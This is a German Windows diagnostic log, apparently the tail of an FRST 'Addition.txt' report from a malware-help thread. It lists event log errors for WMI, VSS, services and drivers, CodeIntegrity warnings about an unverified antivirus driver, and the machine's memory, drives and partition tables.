Description: Ereignisfilter mit Abfrage "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" konnte im Namespace "//./root/CIMV2" nicht reaktiviert werden aufgrund des Fehlers 0x80041003. Ereignisse können nicht durch diesen Filter geschickt werden, bis dieses Problem gelöst ist.
Error: (05/06/2017 10:15:53 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Ereignisfilter mit Abfrage "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" konnte im Namespace "//./root/CIMV2" nicht reaktiviert werden aufgrund des Fehlers 0x80041003. Ereignisse können nicht durch diesen Filter geschickt werden, bis dieses Problem gelöst ist.
Error: (05/06/2017 07:44:56 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Ereignisfilter mit Abfrage "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" konnte im Namespace "//./root/CIMV2" nicht reaktiviert werden aufgrund des Fehlers 0x80041003. Ereignisse können nicht durch diesen Filter geschickt werden, bis dieses Problem gelöst ist.
Error: (05/06/2017 07:44:03 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Ereignisfilter mit Abfrage "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" konnte im Namespace "//./root/CIMV2" nicht reaktiviert werden aufgrund des Fehlers 0x80041003. Ereignisse können nicht durch diesen Filter geschickt werden, bis dieses Problem gelöst ist.
Error: (05/06/2017 07:03:58 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Ereignisfilter mit Abfrage "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" konnte im Namespace "//./root/CIMV2" nicht reaktiviert werden aufgrund des Fehlers 0x80041003. Ereignisse können nicht durch diesen Filter geschickt werden, bis dieses Problem gelöst ist.
Error: (05/06/2017 07:01:20 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Ereignisfilter mit Abfrage "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" konnte im Namespace "//./root/CIMV2" nicht reaktiviert werden aufgrund des Fehlers 0x80041003. Ereignisse können nicht durch diesen Filter geschickt werden, bis dieses Problem gelöst ist.
Error: (05/06/2017 05:20:28 PM) (Source: VSS) (EventID: 8194) (User: )
Description: Volumeschattenkopie-Dienstfehler: Beim Abfragen nach der Schnittstelle "IVssWriterCallback" ist ein unerwarteter Fehler aufgetreten. hr = 0x80070005, Zugriff verweigert
.
Die Ursache hierfür ist oft eine falsche Sicherheitseinstellung im Schreib- oder Anfrageprozess.
Vorgang:
Generatordaten werden gesammelt
Kontext:
Generatorklassen-ID: {e8132975-6f93-4464-a53e-1050253ae220}
Generatorname: System Writer
Generatorinstanz-ID: {2dc548d5-431d-4c7b-8ddd-688079264ca9}
Error: (05/06/2017 05:34:04 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3001) (User: NT-AUTORITÄT)
Description: Die Namenszeichenfolgenwert für den Leistungsindikator in der Registrierung ist falsch formatiert. Die falsch formatierte Zeichenfolge ist "�". Das erste DWORD im Datenbereich enthält den Indexwert für die falsch formatierte Zeichenfolge, während das zweite und dritte DWORD im Datenbereich die letzten gültigen Indexwerte enthalten.
Error: (05/06/2017 05:28:01 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3001) (User: NT-AUTORITÄT)
Description: Die Namenszeichenfolgenwert für den Leistungsindikator in der Registrierung ist falsch formatiert. Die falsch formatierte Zeichenfolge ist "�". Das erste DWORD im Datenbereich enthält den Indexwert für die falsch formatierte Zeichenfolge, während das zweite und dritte DWORD im Datenbereich die letzten gültigen Indexwerte enthalten.
Error: (05/06/2017 02:27:06 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3001) (User: NT-AUTORITÄT)
Description: Die Namenszeichenfolgenwert für den Leistungsindikator in der Registrierung ist falsch formatiert. Die falsch formatierte Zeichenfolge ist "�". Das erste DWORD im Datenbereich enthält den Indexwert für die falsch formatierte Zeichenfolge, während das zweite und dritte DWORD im Datenbereich die letzten gültigen Indexwerte enthalten.
Systemfehler:
=============
Error: (05/06/2017 10:17:14 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Software Protection" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 120000 Millisekunden durchgeführt: Neustart des Diensts.
Error: (05/06/2017 10:16:59 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "NVIDIA Display Driver Service" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.
Error: (05/06/2017 10:16:55 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Windows Installer" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 120000 Millisekunden durchgeführt: Neustart des Diensts.
Error: (05/06/2017 10:16:46 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "NVIDIA Update Service Daemon" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.
Error: (05/06/2017 10:16:42 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "Adobe Acrobat Update Service" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.
Error: (05/06/2017 10:15:20 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "Superfetch" wurde mit folgendem Fehler beendet:
Das System kann die angegebene Datei nicht finden.
Error: (05/06/2017 10:14:54 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "InterBase XE3 Guardian developer_ibxe3" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.
Error: (05/06/2017 10:14:54 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: Das Zeitlimit (30000 ms) wurde beim Verbindungsversuch mit dem Dienst InterBase XE3 Server developer_ibxe3 erreicht.
Error: (05/06/2017 10:14:32 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "DgiVecp" wurde aufgrund folgenden Fehlers nicht gestartet:
Der Treiber konnte nicht geladen werden.
Error: (05/06/2017 10:14:32 PM) (Source: Application Popup) (EventID: 1060) (User: )
Description: Aufgrund der Inkompatibilität mit diesem System wurde \??\C:\Windows\SysWow64\Drivers\DgiVecp.sys nicht geladen. Wenden Sie sich an den Softwarehersteller, um eine kompatible Version des Treibers zu erhalten.
CodeIntegrity:
===================================
Date: 2016-09-21 14:03:06.632
Description: Windows konnte die Abbildintegrität der Datei "\Device\HarddiskVolume4\Windows\System32\drivers\aswHdsKe.sys" nicht überprüfen, weil der Dateihash nicht im System gefunden wurde. Möglicherweise wurde durch eine kürzlich durchgeführte Hardware- oder Softwareänderung eine falsch signierte oder beschädigte Datei oder eine Datei, bei der es sich um schädliche Software aus einer unbekannten Quelle handelt, installiert.
Date: 2016-09-21 14:03:06.632
Description: Windows konnte die Abbildintegrität der Datei "\Device\HarddiskVolume4\Windows\System32\drivers\aswHdsKe.sys" nicht überprüfen, weil der Dateihash nicht im System gefunden wurde. Möglicherweise wurde durch eine kürzlich durchgeführte Hardware- oder Softwareänderung eine falsch signierte oder beschädigte Datei oder eine Datei, bei der es sich um schädliche Software aus einer unbekannten Quelle handelt, installiert.
Date: 2016-09-20 14:02:28.532
Description: Windows konnte die Abbildintegrität der Datei "\Device\HarddiskVolume4\Windows\System32\drivers\aswHdsKe.sys" nicht überprüfen, weil der Dateihash nicht im System gefunden wurde. Möglicherweise wurde durch eine kürzlich durchgeführte Hardware- oder Softwareänderung eine falsch signierte oder beschädigte Datei oder eine Datei, bei der es sich um schädliche Software aus einer unbekannten Quelle handelt, installiert.
Date: 2016-09-20 14:02:28.531
Description: Windows konnte die Abbildintegrität der Datei "\Device\HarddiskVolume4\Windows\System32\drivers\aswHdsKe.sys" nicht überprüfen, weil der Dateihash nicht im System gefunden wurde. Möglicherweise wurde durch eine kürzlich durchgeführte Hardware- oder Softwareänderung eine falsch signierte oder beschädigte Datei oder eine Datei, bei der es sich um schädliche Software aus einer unbekannten Quelle handelt, installiert.
==================== Speicherinformationen ===========================
Prozessor: Intel(R) Core(TM)2 Duo CPU E8400 @ 3.00GHz
Prozentuale Nutzung des RAM: 22%
Installierter physikalischer RAM: 8191.12 MB
Verfügbarer physikalischer RAM: 6348.08 MB
Summe virtueller Speicher: 32762.42 MB
Verfügbarer virtueller Speicher: 30890.09 MB
==================== Laufwerke ================================
Drive c: (System) (Fixed) (Total:195.31 GB) (Free:14.49 GB) NTFS
Drive d: (Coding) (Fixed) (Total:1804.41 GB) (Free:798.17 GB) NTFS
Drive e: (Videos) (Fixed) (Total:1397.26 GB) (Free:588.01 GB) NTFS
Drive t: (Tpart) (Fixed) (Total:713.67 GB) (Free:146.87 GB) NTFS
Drive u: (Upart) (Fixed) (Total:292.97 GB) (Free:25.45 GB) NTFS
Drive v: (Vista) (Fixed) (Total:195.31 GB) (Free:38.78 GB) NTFS
Drive w: (WinXP) (Fixed) (Total:58.59 GB) (Free:33.84 GB) NTFS ==>[System mit Startkomponenten (eingeholt von Laufwerk)]
==================== MBR & Partitionstabelle ==================
========================================================
Disk: 0 (Size: 1397.3 GB) (Disk ID: E0D5472A)
Partition 1: (Not Active) - (Size=1397.3 GB) - (Type=07 NTFS)
========================================================
Disk: 1 (Size: 1397.3 GB) (Disk ID: 00000001)
Partition 1: (Active) - (Size=195.3 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=195.3 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=293 GB) - (Type=07 NTFS)
Partition 4: (Not Active) - (Size=713.7 GB) - (Type=07 NTFS)
========================================================
Disk: 2 (MBR Code: Windows 7 or 8) (Size: 1863 GB) (Disk ID: C3F692C0)
Partition 1: (Active) - (Size=58.6 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=1804.4 GB) - (Type=OF Extended)
==================== Ende von Addition.txt ============================
06.05.2017, 18:57
Linear-Darstellung
